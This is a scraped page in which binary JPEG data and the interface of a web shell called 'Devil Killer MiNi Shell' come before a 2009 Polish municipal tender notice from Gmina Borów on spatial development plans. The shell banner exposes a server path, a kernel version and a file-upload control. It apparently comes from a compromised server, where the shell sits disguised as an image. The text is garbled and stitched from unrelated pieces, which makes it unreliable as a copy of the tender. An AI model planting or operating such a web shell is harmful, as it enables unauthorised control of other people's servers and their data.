JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/110692-N-2009.html

<p class="kh_header"><b>Borów: Przedmiotem postępowania jest udzielenie zamówienia na realizację zadania pn. Opracowanie projektów miejscowych planów zagospodarowania przestrzennego oraz opracowanie projektu zmiany  miejscowych planów zagospodarowania przestrzennego dla określonych terenów:
Zadanie nr 1 - Obręb Suchowice
Zadanie nr 2 - Obręb Siemianów
Zadanie nr 3 - Obręb Kurczów
Zadanie nr 4 -  cały obręb Borek Strzeliński</b><br>
<b>Numer ogłoszenia: 110692 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Borów , ul. Konstytucji 3 Maja 22, 57-160 Borów, woj. dolnośląskie, tel. 071 3933022, faks 071 3933035.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.borow.ug.g.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem postępowania jest udzielenie zamówienia na realizację zadania pn. Opracowanie projektów miejscowych planów zagospodarowania przestrzennego oraz opracowanie projektu zmiany  miejscowych planów zagospodarowania przestrzennego dla określonych terenów:
Zadanie nr 1 - Obręb Suchowice
Zadanie nr 2 - Obręb Siemianów
Zadanie nr 3 - Obręb Kurczów
Zadanie nr 4 -  cały obręb Borek Strzeliński.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia 
 Przedmiotem zamówienia jest opracowanie projektów miejscowych  planów zagospodarowania przestrzennego oraz zmiany planów zagospodarowania przestrzennego  zgodnie z podjętymi uchwałami Rady Gminy  w tym zakresie.
Opis części zamówienia 
Zamawiający podzielił przedmiot zamówienia na wyodrębnione części - 4 zadania tj.
 	Zadanie nr 1 - Obręb Suchowice
 	Zadanie nr 2 - Obręb Siemianów
 	Zadanie nr 3 - Obręb Kurczów
 	Zadanie nr 4 -  cały obręb Borek Strzeliński 
    Zamawiający dopuszcza możliwość realizowania poszczególnych zadań przez różnych Wykonawców.
 Wykonawca może złożyć  jedną ofertę na dowolną liczbę zadań.
 
 Zadanie nr 1
Opracowanie projektu miejscowego planu zagospodarowania przestrzennego obrębu Suchowice zgodnie z art. 15 ust. 2 ustawy  z dnia 27  marca  2003 r. o planowaniu i zagospodarowaniu   przestrzennym obejmujące:
	1)	przeznaczenie terenów oraz linie rozgraniczające tereny o różnym przeznaczeniu lub różnych zasadach zagospodarowania;
	2)	zasady ochrony i kształtowania ładu przestrzennego;
	3)	zasady ochrony środowiska, przyrody i krajobrazu kulturowego;
	4)	zasady ochrony dziedzictwa kulturowego i zabytków oraz dóbr kultury współczesnej;
	5)	wymagania wynikające z potrzeb kształtowania przestrzeni publicznych;
	6)	parametry i wskaźniki kształtowania zabudowy oraz zagospodarowania terenu, w tym linie zabudowy, gabaryty obiektów i wskaźniki intensywności zabudowy;
	7)	granice i sposoby zagospodarowania terenów lub obiektów podlegających ochronie, ustalonych na podstawie odrębnych przepisów, w tym terenów górniczych, a także narażonych na niebezpieczeństwo powodzi oraz zagrożonych osuwaniem się mas ziemnych;
	8)	szczegółowe zasady i warunki scalania i podziału nieruchomości objętych planem miejscowym;
	9)	szczególne warunki zagospodarowania terenów oraz ograniczenia w ich użytkowaniu, w tym zakaz zabudowy;
	10)	zasady modernizacji, rozbudowy i budowy systemów komunikacji i infrastruktury technicznej;
	11)	sposób i termin tymczasowego zagospodarowania, urządzania i użytkowania terenów;
	12)	stawki procentowe, na podstawie których ustala się opłatę, o której mowa w art. 36 ust. 4.
  
 
Oznaczenie innych obszarów w zmianie planu powinno nastąpić w zależności od potrzeb określonych w art.15 ust.3 ustawy o planowaniu i zagospodarowaniu przestrzennym.

Powyższe wymagania odnoszą się dla terenów określonych w uchwale:
 
Uchwała NrXXII/142/2008 z dnia 18 listopada 2008 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego obrębu Suchowice


Obszar do sporządzenia planu dla zadania nr 1.  wynosi 638,4719 ha.

Zamówienie obejmuje również:
 	pozyskanie przez Wykonawcę aktualnych wypisów  z ewidencji gruntów z  adresowym wykazem właścicieli i zbadaniem ksiąg wieczystych,
Wymóg ten nie jest dla Wykonawcy wymogiem obowiązkowym. Zamawiający pozostawia 
w gestii Wykonawcy uznanie czy materiały te są mu niezbędne dla prawidłowego sporządzenia opracowania.
 	uzyskanie wymaganych przepisami opinii, uzgodnień i zatwierdzeń związanych 
z przygotowaniem, opracowania do uchwalenia przez Radę Gminy Borów,
 	obsługę administracyjną, rozumianą jako wykonywanie przez Wykonawcę  czynności określonych w art. 17 ustawy  z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr.80 poz. 717z późniejszymi zmianami),
 	analizę wniosków do planu, które wpłynęły przed ogłoszeniem i obwieszczeniem o przystąpieniu do sporządzenia planu.
 
Opracowanie winno być sporządzone w skali  1: 2000.
Opracowanie winno odzwierciedlać aktualne Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Borów. 
Projekt  miejscowego planu zagospodarowania przestrzennego  (przed uchwaleniem przez Radę Gminy) wraz z załącznikami: 
1)	tekstem planu,
2)	rysunkiem planu w skali 1: 2000,
3)	rozstrzygnięciem o sposobie rozpatrzenia uwag zgłoszonych do projektu planu, 
4)	stwierdzeniem zgodności zmiany planu z ustaleniami studium,
5)	rozstrzygnięciem o sposobie realizacji zapisanych w planie inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych gminy oraz o zasadach ich finansowania zgodnie 
z przepisami o finansach publicznych,
6)	prognozą oddziaływania na środowisko,
7)	zestawieniem działek objętych opłatą planistyczną wraz z podaniem powierzchni tych działek; 
w przypadku objęcia opłatą planistyczną części działek - podanie  powierzchni części tych działek,
- ma zostać  dostarczony  w 5 egzemplarzach.

Zadanie nr 2
Opracowanie projektu miejscowego planu zagospodarowania przestrzennego obrębu Siemianów zgodnie z art. 15 ust. 2 ustawy  z dnia 27  marca  2003 r. o planowaniu 
i zagospodarowaniu przestrzennym obejmujące:
1)	przeznaczenie terenów oraz linie rozgraniczające tereny o różnym przeznaczeniu lub różnych zasadach zagospodarowania;
2)	zasady ochrony i kształtowania ładu przestrzennego;
3)	zasady ochrony środowiska, przyrody i krajobrazu kulturowego;
4)	zasady ochrony dziedzictwa kulturowego i zabytków oraz dóbr kultury współczesnej;
5)	wymagania wynikające z potrzeb kształtowania przestrzeni publicznych;
6)	parametry i wskaźniki kształtowania zabudowy oraz zagospodarowania terenu, w tym linie zabudowy, gabaryty obiektów i wskaźniki intensywności zabudowy;
7)	granice i sposoby zagospodarowania terenów lub obiektów podlegających ochronie, ustalonych na podstawie odrębnych przepisów, w tym terenów górniczych, a także narażonych na niebezpieczeństwo powodzi oraz zagrożonych osuwaniem się mas ziemnych;
8)	szczegółowe zasady i warunki scalania i podziału nieruchomości objętych planem miejscowym;
9)	szczególne warunki zagospodarowania terenów oraz ograniczenia w ich użytkowaniu, w tym zakaz zabudowy;
10)	zasady modernizacji, rozbudowy i budowy systemów komunikacji i infrastruktury technicznej;
11)	sposób i termin tymczasowego zagospodarowania, urządzania i użytkowania terenów;
12)	stawki procentowe, na podstawie których ustala się opłatę, o której mowa w art. 36 ust. 4.

Oznaczenie innych obszarów w zmianie planu powinno nastąpić w zależności od potrzeb określonych w art.15 ust.3 ustawy o planowaniu i zagospodarowaniu przestrzennym.

Powyższe wymagania odnoszą się dla terenów określonych w uchwale:
Uchwała Nr XXII/141/2008  Rady Gminy Borów z dnia 21 stycznia 2009 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego obrębu Siemianów

Obszar do sporządzenia planu dla zadania nr 2  wynosi 537,3743 ha.

Zamówienie obejmuje również:
 	pozyskanie przez Wykonawcę aktualnych wypisów  z ewidencji gruntów z  adresowym wykazem właścicieli i zbadaniem ksiąg wieczystych,
Wymóg ten nie jest dla Wykonawcy wymogiem obowiązkowym. Zamawiający pozostawia 
w gestii Wykonawcy uznanie czy materiały te są mu niezbędne dla prawidłowego sporządzenia opracowania.
 	uzyskanie wymaganych przepisami opinii, uzgodnień i zatwierdzeń związanych 
z przygotowaniem, opracowania do uchwalenia przez Radę Gminy Borów,
 	obsługę administracyjną, rozumianą jako wykonywanie przez Wykonawcę czynności określonych w art. 17 ustawy  z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr.80 poz. 717z późniejszymi zmianami),
 	analizę wniosków do planu, które wpłynęły przed ogłoszeniem i obwieszczeniem o przystąpieniu do sporządzenia planu.
 
Opracowanie winno być sporządzone w skali  1: 2000.
Opracowanie winno odzwierciedlać aktualne Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Borów. 

Projekt  miejscowego planu zagospodarowania przestrzennego  (przed uchwaleniem przez Radę Gminy) wraz z załącznikami: 
1)	tekstem planu,
2)	rysunkiem planu w skali 1: 2000,
3)	rozstrzygnięciem o sposobie rozpatrzenia uwag zgłoszonych do projektu planu, 
4)	stwierdzeniem zgodności zmiany planu z ustaleniami studium,
5)	rozstrzygnięciem o sposobie realizacji zapisanych w planie inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych gminy oraz o zasadach ich finansowania zgodnie 
z przepisami o finansach publicznych,
6)	prognozą oddziaływania na środowisko,
7)	zestawieniem działek objętych opłatą planistyczną wraz z podaniem powierzchni tych działek; 
w przypadku objęcia opłatą planistyczną części działek - podanie  powierzchni części tych działek,
- ma zostać  dostarczony  w 5 egzemplarzach.
Zadanie nr 3
Opracowanie projektu miejscowego planu zagospodarowania przestrzennego obrębu Kurczów zgodnie z art. 15 ust. 2 ustawy  z dnia 27  marca  2003 r. o planowaniu 
i zagospodarowaniu przestrzennym obejmujące:
1)	przeznaczenie terenów oraz linie rozgraniczające tereny o różnym przeznaczeniu lub różnych zasadach zagospodarowania;
2)	zasady ochrony i kształtowania ładu przestrzennego;
3)	zasady ochrony środowiska, przyrody i krajobrazu kulturowego;
4)	zasady ochrony dziedzictwa kulturowego i zabytków oraz dóbr kultury współczesnej;
5)	wymagania wynikające z potrzeb kształtowania przestrzeni publicznych;
6)	parametry i wskaźniki kształtowania zabudowy oraz zagospodarowania terenu, w tym linie zabudowy, gabaryty obiektów i wskaźniki intensywności zabudowy;
7)	granice i sposoby zagospodarowania terenów lub obiektów podlegających ochronie, ustalonych na podstawie odrębnych przepisów, w tym terenów górniczych, a także narażonych na niebezpieczeństwo powodzi oraz zagrożonych osuwaniem się mas ziemnych;
8)	szczegółowe zasady i warunki scalania i podziału nieruchomości objętych planem miejscowym;
9)	szczególne warunki zagospodarowania terenów oraz ograniczenia w ich użytkowaniu, w tym zakaz zabudowy;
10)	zasady modernizacji, rozbudowy i budowy systemów komunikacji i infrastruktury technicznej;
11)	sposób i termin tymczasowego zagospodarowania, urządzania i użytkowania terenów;
12)	stawki procentowe, na podstawie których ustala się opłatę, o której mowa w art. 36 ust. 4.

Oznaczenie innych obszarów w zmianie planu powinno nastąpić w zależności od potrzeb określonych w art.15 ust.3 ustawy o planowaniu i zagospodarowaniu przestrzennym.

Powyższe wymagania odnoszą się dla terenów określonych w uchwale:
Uchwała Nr XXVII/170/2009   Rady Gminy Borów z dnia 17 marca 2009 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego obrębu Kurczów

Obszar do sporządzenia planu dla zadania nr 3   wynosi 358,9751 ha.

Zamówienie obejmuje również:
 	pozyskanie przez Wykonawcę aktualnych wypisów  z ewidencji gruntów z  adresowym wykazem właścicieli i zbadaniem ksiąg wieczystych,
Wymóg ten nie jest dla Wykonawcy wymogiem obowiązkowym. Zamawiający pozostawia 
w gestii Wykonawcy uznanie czy materiały te są mu niezbędne dla prawidłowego sporządzenia opracowania.
 	uzyskanie wymaganych przepisami opinii, uzgodnień i zatwierdzeń związanych 
z przygotowaniem, opracowania do uchwalenia przez Radę Gminy Borów,
  czynności określonych w art. 17 ustawy  z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr.80 poz. 717z późniejszymi zmianami),
 	analizę wniosków do planu, które wpłynęły przed ogłoszeniem i obwieszczeniem o przystąpieniu do sporządzenia planu.
 
Opracowanie winno być sporządzone w skali  1: 2000.
Opracowanie winno odzwierciedlać aktualne Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Borów. 

Projekt  miejscowego planu zagospodarowania przestrzennego  (przed uchwaleniem przez Radę Gminy) wraz z załącznikami: 
1)	tekstem planu,
2)	rysunkiem planu w skali 1: 2000,
3)	rozstrzygnięciem o sposobie rozpatrzenia uwag zgłoszonych do projektu planu, 
4)	stwierdzeniem zgodności zmiany planu z ustaleniami studium,
5)	rozstrzygnięciem o sposobie realizacji zapisanych w planie inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych gminy oraz o zasadach ich finansowania zgodnie 
z przepisami o finansach publicznych,
6)	prognozą oddziaływania na środowisko,
7)	zestawieniem działek objętych opłatą planistyczną wraz z podaniem powierzchni tych działek; 
w przypadku objęcia opłatą planistyczną części działek - podanie  powierzchni części tych działek,
- ma zostać  dostarczony  w 5 egzemplarzach.
Zadanie nr 4
Opracowanie projektu zmian miejscowych planów zagospodarowania przestrzennego dla całego obrębu Borka Strzelińskiego zgodnie z art. 15 ust. 2 ustawy  z dnia 27  marca  2003 r. o planowaniu 
i zagospodarowaniu przestrzennym obejmujące:
1)	przeznaczenie terenów oraz linie rozgraniczające tereny o różnym przeznaczeniu lub różnych zasadach zagospodarowania;
2)	zasady ochrony i kształtowania ładu przestrzennego;
3)	zasady ochrony środowiska, przyrody i krajobrazu kulturowego;
4)	zasady ochrony dziedzictwa kulturowego i zabytków oraz dóbr kultury współczesnej;
5)	wymagania wynikające z potrzeb kształtowania przestrzeni publicznych;
6)	parametry i wskaźniki kształtowania zabudowy oraz zagospodarowania terenu, w tym linie zabudowy, gabaryty obiektów i wskaźniki intensywności zabudowy;
7)	granice i sposoby zagospodarowania terenów lub obiektów podlegających ochronie, ustalonych na podstawie odrębnych przepisów, w tym terenów górniczych, a także narażonych na niebezpieczeństwo powodzi oraz zagrożonych osuwaniem się mas ziemnych;
8)	szczegółowe zasady i warunki scalania i podziału nieruchomości objętych planem miejscowym;
9)	szczególne warunki zagospodarowania terenów oraz ograniczenia w ich użytkowaniu, w tym zakaz zabudowy;
10)	zasady modernizacji, rozbudowy i budowy systemów komunikacji i infrastruktury technicznej;
11)	sposób i termin tymczasowego zagospodarowania, urządzania i użytkowania terenów;
12)	stawki procentowe, na podstawie których ustala się opłatę, o której mowa w art. 36 ust. 4.

Oznaczenie innych obszarów w zmianie planu powinno nastąpić w zależności od potrzeb określonych w art.15 ust.3 ustawy o planowaniu i zagospodarowaniu przestrzennym.

Powyższe wymagania odnoszą się dla terenów określonych w uchwale:
Uchwała NrXXVII/169/2009 Rady Gminy Borów z dnia 17 marca 2009 r. w sprawie przystąpienia do sporządzenia zmiany miejscowych planów zagospodarowania przestrzennego całego obrębu Borek Strzeliński

Obszar do sporządzenia planów dla zadania nr 4  wynosi 1120,6850 ha.

Zamówienie obejmuje również:
 	pozyskanie przez Wykonawcę aktualnych wypisów  z ewidencji gruntów z  adresowym wykazem właścicieli i zbadaniem ksiąg wieczystych,
Wymóg ten nie jest dla Wykonawcy wymogiem obowiązkowym. Zamawiający pozostawia 
w gestii Wykonawcy uznanie czy materiały te są mu niezbędne dla prawidłowego sporządzenia opracowania.
 	uzyskanie wymaganych przepisami opinii, uzgodnień i zatwierdzeń związanych 
z przygotowaniem, opracowania do uchwalenia przez Radę Gminy Borów,
 	obsługę administracyjną, rozumianą jako wykonywanie przez Wykonawcę czynności określonych w art. 17 ustawy  z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr.80 poz. 717z późniejszymi zmianami),
 	analizę wniosków do planu, które wpłynęły przed ogłoszeniem i obwieszczeniem o przystąpieniu do sporządzenia zmiany planu.
 
Opracowanie winno być sporządzone w skali  1: 2000.
Opracowanie winno odzwierciedlać aktualne Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Borów. 
Projekt  zmiany miejscowych  planów zagospodarowania przestrzennego  (przed uchwaleniem przez Radę Gminy) wraz z załącznikami: 
1)	jednolitym tekstem planów,
2)	jednolitym rysunkiem planów w skali 1: 2000,
3)	rozstrzygnięciem o sposobie rozpatrzenia uwag zgłoszonych do projektów planów, 
4)	stwierdzeniem zgodności zmiany planów z ustaleniami studium,
5)	rozstrzygnięciem o sposobie realizacji zapisanych w planie inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych gminy oraz o zasadach ich finansowania zgodnie 
z przepisami o finansach publicznych,
6)	prognozą oddziaływania na środowisko,
7)	zestawieniem działek objętych opłatą planistyczną wraz z podaniem powierzchni tych działek; 
w przypadku objęcia opłatą planistyczną części działek - podanie  powierzchni części tych działek,
- ma zostać  dostarczony  w 5 egzemplarzach.

Po uchwaleniu projektów planów oraz projektu zmian planów  przez Radę Gminy tekst uchwały wraz z  załącznikami ma zostać dostarczony  w terminie 3 dni w 5 egzemplarzach.
Załączniki przedstawiające rysunek planu mogą być pomniejszone.
Ostateczne wersje planów dla w/w zadań  w skali 1:2000  należy dostarczyć:
5 x wersja papierowa,
2 x wersja elektroniczna  (rysunek planu zawierający wszystkie warstwy, dane opisowe,   bazy wraz z tekstem MPZP w formacie MS Word 97-2003 + legendy w formacie PDF).
Zamówienie musi spełniać poniższe warunki techniczne:    
-	opracowanie musi być przekazane w formie papierowej i cyfrowej, opracowania te  muszą być tożsame,
-	szczegółowa struktura bazy danych, nazewnictwo warstw itp. zostanie uzgodnione po podpisaniu umowy,
-	legenda ma być przekazana w postaci plików PDF, zapisana na 1 stronie A4 lub A3.

Opracowanie ma być sporządzone w skali 1: 2000 na aktualnych geodezyjnych wektorowych podkładach mapowych (mapa zasadnicza, mapa ewidencyjna).

       Zamówienie musi  być wykonane zgodnie z obowiązującymi przepisami, w tym Rozporządzeniem Ministra Infrastruktury  z dnia 26.08.2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego ( Dz. U. Nr 164.1587).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie  zamówienia publicznego mogą ubiegać się Wykonawcy, którzy zgodnie z ustawą Prawo zamówień publicznych  nie podlegają wykluczeniu w trybie art. 24 ust. 1 i 2 oraz spełniają warunki udziału w postępowaniu  określone w art. 22 ust. 1 i spełniają wymagania określone w specyfikacji istotnych warunków zamówienia. Wykonawca ubiegający się o przedmiotowe zamówienie musi złożyć oświadczenie o spełnieniu tych warunków oraz dokumenty na ich potwierdzenie zgodnie z art. 44 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełnienia tych warunków udziału w postępowaniu, określonych w SIWZ, poprzez zastosowanie kryterium spełnia nie spełnia tj. zgodnie z zasadą  czy dokumenty zostały załączone do oferty i czy spełniają określone wymagania.   W celu wykazania spełnienia warunków udziału w postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą oświadczenie oraz stosowne dokumenty,wymienione poniżej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Warunki szczegółowe określone  SIWZ - wraz z ofertą każdy z Wykonawców powinien złożyć oświadczenie, że posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia-załącznik nr 2 do SIWZ. Jednocześnie do oferty należy załączyć:  
 	1.wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca w trakcie realizacji przedmiotu zamówienia- załącznik nr 4 do SIWZ;
 	2.wykaz wykonanych w okresie ostatnich trzech lat usług, ze szczególnym uwzględnieniem usług świadczonych na rzecz podmiotów prowadzących działalność zbliżoną do działalności Zamawiającego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie -zgodnie z załącznikiem nr 5 do SIWZ oraz dokumenty potwierdzające, że usługi te zostały wykonane z należytą starannością.
 
5.1.2	Warunki szczegółowe określone w punkcie 4.2.2 SIWZ - wraz z ofertą każdy z Wykonawców powinien złożyć oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia-załącznik nr 2 do SIWZ.  
5.1.3	Warunki szczegółowe określone w punkcie 4.2.3 SIWZ - wraz z ofertą każdy z Wykonawców powinien złożyć oświadczenie potwierdzające, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz to, że Wykonawca nie podlega wykluczeniu z postępowania o udzielenia zamówienia publicznego-załącznik nr 2 do SIWZ.  Do oferty każdy z Wykonawców powinien załączyć także:
1.	zaświadczenie o przynależności Wykonawcy do Izby Urbanistów;
2.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3.	aktualne informacje z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4.	aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5.	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania ofert;
